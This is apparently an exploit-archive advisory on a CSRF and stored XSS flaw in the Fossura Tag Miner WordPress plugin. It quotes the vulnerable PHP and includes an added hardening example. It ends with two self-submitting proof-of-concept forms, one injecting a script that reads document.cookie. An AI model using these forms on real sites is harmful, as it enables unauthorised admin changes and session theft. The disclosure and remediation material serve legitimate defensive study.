Wordpress Tag Miner Cross Site Request Forgery

2015-08-19
ID: 81221
CVE: None
Download vulnerable application: None
######################
# Exploit Title : 
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/fossura-tag-miner/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/fossura-tag-miner.1.1.2.zip
# Version : 1.1.2
######################
# Explanation:
# This plugin had an XSS bug before, but now I checked it and I found a CSRF bug in the options page. There is no token for patching CSRF and you can send a request to it.
# As you know there is an XSS bug in this page in fossura-tag-miner-admin.php - lines 364, 369:

// Request input is stored without validation or sanitisation.
if ( isset($_POST['fossura_tags_number'] ) ) {
    $number = $_POST['fossura_tags_number'];
}
echo '<p>';
// $name and $disabled are set earlier in the plugin (not shown here).
// $number is written straight into an unquoted attribute with no escaping,
// so a value containing " or > breaks out of the <input> tag.
echo "<input type=text name=$name value=$number " . $disabled . ">";
echo '</p>';

# And you can use CSRF and XSS together.
# Another thing is: by default some of the options are disabled because of the professional version, but you can change these options through this CSRF.
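# The following is an added illustration (not the plugin's own code and not part of the original advisory) of how a WordPress settings handler like the one above is normally hardened against both issues: a per-user nonce so a cross-site form cannot submit the settings, a capability check, server-side validation of each field, and attribute escaping on output. It assumes it runs inside WordPress (wp_nonce_field, check_admin_referer, current_user_can, absint, sanitize_key, wp_unslash, esc_attr, update_option, get_option, submit_button and add_action are WordPress core functions); the fossura_example_* function, constant and option names are hypothetical, while the form field names are the ones used on this page.

```php
<?php
// Added example, not the plugin's code. Hypothetical hardened settings
// handler for a WordPress options page; assumes WordPress core is loaded.

// Nonce action and form field names (hypothetical identifiers).
const FOSSURA_EXAMPLE_NONCE_ACTION = 'fossura_example_update_settings';
const FOSSURA_EXAMPLE_NONCE_FIELD  = 'fossura_example_nonce';

// Hypothetical gate for features that are only enabled in the paid version.
function fossura_example_pro_features_enabled() {
    return (bool) get_option( 'fossura_example_pro_enabled', false );
}

// 1. Handle the POST. Nothing is stored unless the request carries a valid
//    nonce bound to the logged-in user and the user may manage options.
function fossura_example_handle_settings_post() {
    if ( ! isset( $_POST['fossura_tag_miner_update_settings'] ) ) {
        return; // not a settings submission
    }

    // check_admin_referer() verifies the nonce and stops the request with a
    // "link has expired" page when it is missing or invalid. A form hosted on
    // another site cannot know the victim's nonce, so a forged POST ends here.
    check_admin_referer( FOSSURA_EXAMPLE_NONCE_ACTION, FOSSURA_EXAMPLE_NONCE_FIELD );

    // The nonce proves intent; this proves authorisation.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // Validate every field against what it is allowed to contain instead of
    // storing raw request input. fossura_tags_number is a count, so cast it.
    $number = isset( $_POST['fossura_tags_number'] )
        ? absint( wp_unslash( $_POST['fossura_tags_number'] ) )
        : 0;

    // Enumerated values are checked against an allow-list.
    $mode = isset( $_POST['fossura_tags_mode'] )
        ? sanitize_key( wp_unslash( $_POST['fossura_tags_mode'] ) )
        : 'classic';
    if ( ! in_array( $mode, array( 'classic' ), true ) ) {
        $mode = 'classic';
    }

    update_option( 'fossura_example_tags_number', $number );
    update_option( 'fossura_example_tags_mode', $mode );

    // A "disabled" attribute in the HTML form is only a client-side hint; a
    // forged or hand-crafted POST can still carry the field. Options that are
    // meant to be locked must therefore be gated on the server as well.
    if ( fossura_example_pro_features_enabled() ) {
        update_option( 'fossura_example_tags_dates',    ! empty( $_POST['fossura_tags_dates'] ) );
        update_option( 'fossura_example_tags_pronouns', ! empty( $_POST['fossura_tags_pronouns'] ) );
    }
}
add_action( 'admin_init', 'fossura_example_handle_settings_post' );

// 2. Render the form: emit the nonce field and escape every value that is
//    placed into an attribute, including values shown in disabled fields.
function fossura_example_render_number_field( $name, $disabled ) {
    $number = absint( get_option( 'fossura_example_tags_number', 5 ) );

    echo '<p>';
    printf(
        '<input type="text" name="%s" value="%s"%s>',
        esc_attr( $name ),
        esc_attr( $number ),          // esc_attr() encodes " and > so a stored
        $disabled ? ' disabled' : ''  // value can never close the attribute
    );
    echo '</p>';
}

function fossura_example_render_settings_page() {
    echo '<form method="post">';
    wp_nonce_field( FOSSURA_EXAMPLE_NONCE_ACTION, FOSSURA_EXAMPLE_NONCE_FIELD );
    fossura_example_render_number_field( 'fossura_tags_number', false );
    echo '<input type="hidden" name="fossura_tag_miner_update_settings" value="1">';
    submit_button( 'Save settings' );
    echo '</form>';
}
```

# Two points from this sketch carry over to the report above: the nonce check is what closes the CSRF, because the forged form cannot include a value that WordPress ties to the victim's session, and the escaping on output is what closes the XSS, because the stored value is encoded before it lands in the attribute. Gating the "professional" options on the server rather than only with a disabled attribute is what prevents the locked settings from being changed by a crafted request.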

# Exploit 1 (Just CSRF):
<form name="form1" method="POST" action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=fossura-tag-miner">
<input type="hidden" name="fossura_tag_miner_update_settings" value="hunne" />
<input type="hidden" name="fossura_tags_mode" value="classic" />
<input type="hidden" name="fossura_tags_trigger" value="publish" />
<input type="hidden" name="fossura_tags_number" value='CSRFBug'>
<input type="hidden" name="fossura_tags_dates" value="true"  />
<input type="hidden" name="fossura_tags_pronouns" value="true"  />
<input type="hidden" value="Save settings" class="button-primary"/>
</form>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
# Exploit 2 (CSRF & XSS):
<form name="form1" method="POST" action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=fossura-tag-miner">
<input type="hidden" name="fossura_tag_miner_update_settings" value="hunne" />
<input type="hidden" name="fossura_tags_mode" value="classic" />
<input type="hidden" name="fossura_tags_trigger" value="publish" />
<input type="hidden" name="fossura_tags_number" value='"><script>alert(document.cookie)"'>
<input type="hidden" name="fossura_tags_dates" value="true"  />
<input type="hidden" name="fossura_tags_pronouns" value="true"  />
<input type="hidden" value="Save settings" class="button-primary"/>
</form>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
######################
# Discovered By : Ehsan Hosseini.
######################